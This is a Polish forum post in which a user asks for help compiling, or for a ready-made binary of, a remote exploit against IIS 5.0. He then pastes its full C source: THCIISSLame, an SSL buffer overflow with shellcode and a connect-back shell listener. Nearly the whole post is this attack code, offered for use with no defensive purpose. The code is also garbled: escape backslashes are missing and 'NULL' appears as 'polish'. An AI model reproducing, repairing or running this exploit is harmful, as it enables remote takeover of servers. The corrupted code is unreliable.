IIS5 - kompilacja

H

hard21

Użytkownik
Dołączył
Czerwiec 6, 2004
Posty
60
Witam.
Potrzebny mi jest bardzo exploit na IIS 5.0. Jednak mam problemy z kompilacja. Jesli ktos go widzial to z pewnoscia wie o co chodzi. Problem jest taki ze 3ba go kompilowac w MS Visual C++ Sciagnelem ten shit ponad 82 MB. Zainstalowalem na XP ale przy kompilacjii wywala mi bledy. A za tem jesli ktos ma juz skompilowanego i moglby sie podzielic lub wie skad pobrac juz skompilowanego to bede bardzo wdzieczny. Jesli ktos ma moze ten MS Visual C++ to pliiz sprawdzicie czy u was da rade to skompilowac.
oTo oN:
Kod: 
#include <stdlib.h>

#include <string.h>

#include <winsock2.h>



#pragma comment(lib, "ws2_32.lib")



#define jumper    "xebx0f"

#define greetings_to_microsoft "x54x48x43x4fx57x4ex5ax49x49x53x21"



char sslshit[] = "x80x62x01x02xbdx00x01x00x01x00x16x8fx82x01x00x00x00";



char shellcode[] =

"xebx25xe9xfax99xd3x77xf6x02x06x6cx59x6cx59xf8"

"x1dx9cxdex8cxd1x4cx70xd4x03x58x46x57x53x32x5f"

"x33x32x2ex44x4cx4cx01xebx05xe8xf9xffxffxffx5d"

"x83xedx2cx6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"

"xadx8bx78x08x8dx5fx3cx8bx1bx01xfbx8bx5bx78x01"

"xfbx8bx4bx1cx01xf9x8bx53x24x01xfax53x51x52x8b"

"x5bx20x01xfbx31xc9x41x31xc0x99x8bx34x8bx01xfe"

"xacx31xc2xd1xe2x84xc0x75xf7x0fxb6x45x09x8dx44"

"x45x08x66x39x10x75xe1x66x31x10x5ax58x5ex56x50"

"x52x2bx4ex10x41x0fxb7x0cx4ax8bx04x88x01xf8x0f"

"xb6x4dx09x89x44x8dxd8xfex4dx09x75xbexfex4dx08"

"x74x17xfex4dx24x8dx5dx1ax53xffxd0x89xc7x6ax02"

"x58x88x45x09x80x45x79x0cxebx82x50x8bx45x04x35"

"x93x93x93x93x89x45x04x66x8bx45x02x66x35x93x93"

"x66x89x45x02x58x89xcex31xdbx53x53x53x53x56x46"

"x56xffxd0x89xc7x55x58x66x89x30x6ax10x55x57xff"

"x55xe0x8dx45x88x50xffx55xe8x55x55xffx55xecx8d"

"x44x05x0cx94x53x68x2ex65x78x65x68x5cx63x6dx64"

"x94x31xd2x8dx45xccx94x57x57x57x53x53xfexcax01"

"xf2x52x94x8dx45x78x50x8dx45x88x50xb1x08x53x53"

"x6ax10xfexcex52x53x53x53x55xffx55xf0x6axffxff"

"x55xe4";



void usage();

void shell(int sock);



int main(int argc, char *argv[])

{  

  unsigned int i,sock,sock2,sock3,addr,rc,len=16;

  unsigned char *badbuf,*p;

  unsigned long offset = 0x6741a1cd;

  unsigned long XOR = 0xffffffff;

  unsigned long XORIP = 0x93939393;

  unsigned short XORPORT = 0x9393;



  unsigned short cbport;

  unsigned long  cbip;



  struct sockaddr_in mytcp;

  struct hostent * hp;

  WSADATA wsaData;



  printf("nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploitn");

  printf("tested on Windows 2000 Server german/english SP4n");

  printf("by Johnny Cyberpunk ([email protected])n");



  if(argc<4 || argc>4)

   usage();



  badbuf = malloc(352);

  memset(badbuf,0,352);



  printf("n[*] building buffern");



  p = badbuf;



  memcpy(p,sslshit,sizeof(sslshit));



  p+=sizeof(sslshit)-1;

  

  strcat(p,jumper);



  strcat(p,greetings_to_microsoft);



  offset^=XOR;

  strncat(p,(unsigned char *)&offset,4);



  cbport = htons((unsigned short)atoi(argv[3]));

  cbip = inet_addr(argv[2]);

  cbport ^= XORPORT;

  cbip ^= XORIP;

  memcpy(&shellcode[2],&cbport,2);

  memcpy(&shellcode[4],&cbip,4);



  strcat(p,shellcode);

  

  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)

  {

   printf("WSAStartup failed !n");

   exit(-1);

  }

  

  hp = gethostbyname(argv[1]);



  if (!hp){

   addr = inet_addr(argv[1]);

  }

  if ((!hp)  && (addr == INADDR_NONE) )

  {

   printf("Unable to resolve %sn",argv[1]);

   exit(-1);

  }



  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

  if (!sock)

  { 

   printf("socket() error...n");

   exit(-1);

  }

  

  if (hp != polish)

   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);

  else

   mytcp.sin_addr.s_addr = addr;



  if (hp)

   mytcp.sin_family = hp->h_addrtype;

  else

   mytcp.sin_family = AF_INET;



  mytcp.sin_port=htons(443);



  printf("[*] connecting the targetn");



  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));

  if(rc==0)

  {

      send(sock,badbuf,351,0);

      printf("[*] exploit sendn");

  

      mytcp.sin_addr.s_addr = 0;

      mytcp.sin_port=htons((unsigned short)atoi(argv[3]));



      sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

      

      rc=bind(sock2,(struct sockaddr *)&mytcp,16);

      if(rc!=0)

      {

       printf("bind error() %dn",WSAGetLastError());

       exit(-1);

      }

   

      rc=listen(sock2,1);

      if(rc!=0)

      {

       printf("listen error()n");

       exit(-1);

      }



      printf("[*] waiting for shelln");

      sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); 

      if(sock3)

      { 

       printf("[*] Exploit successful ! Have fun !n");

       printf("[*] --------------------------------------------------------------------nn");

       shell(sock3);

      }

  }

  else

  {

   printf("nCan't connect to ssl port 443!n");

   exit(-1);

  }

  

  shutdown(sock,1);

  closesocket(sock);

  shutdown(sock,2);

  closesocket(sock2);

  shutdown(sock,3);

  closesocket(sock3);



  free(badbuf);



  exit(0);

}

 

void usage()

{

 unsigned int a;

 printf("nUsage:  <victim-host> <connectback-ip> <connectback port>n");

 printf("Sample: THCIISSLame [url]www.lameiss.com[/url] 31.33.7.23 31337nn");

 exit(0);

}



void shell(int sock)

{

 int l;

 char buf[1024];

 struct timeval time;

 unsigned long ul[2];



 time.tv_sec = 1;

 time.tv_usec = 0;



 while (1)

 {

  ul[0] = 1;

  ul[1] = sock;



  l = select (0, (fd_set *)&ul, polish, polish, &time);

  if(l == 1)

  {      

   l = recv (sock, buf, sizeof (buf), 0);

   if (l <= 0)

   {

    printf ("bye bye...n");

    return;

   }

  l = write (1, buf, l);

   if (l <= 0)

   {

    printf ("bye bye...n");

    return;

   }

  }

  else

  {

   l = read (0, buf, sizeof (buf));

   if (l <= 0)

   {

    printf("bye bye...n");

    return;

   }

   l = send(sock, buf, l, 0);

   if (l <= 0)

   {

    printf("bye bye...n");

    return;

   }

  }

 }

}
 
You must log in or register to reply here.
Do góry Bottom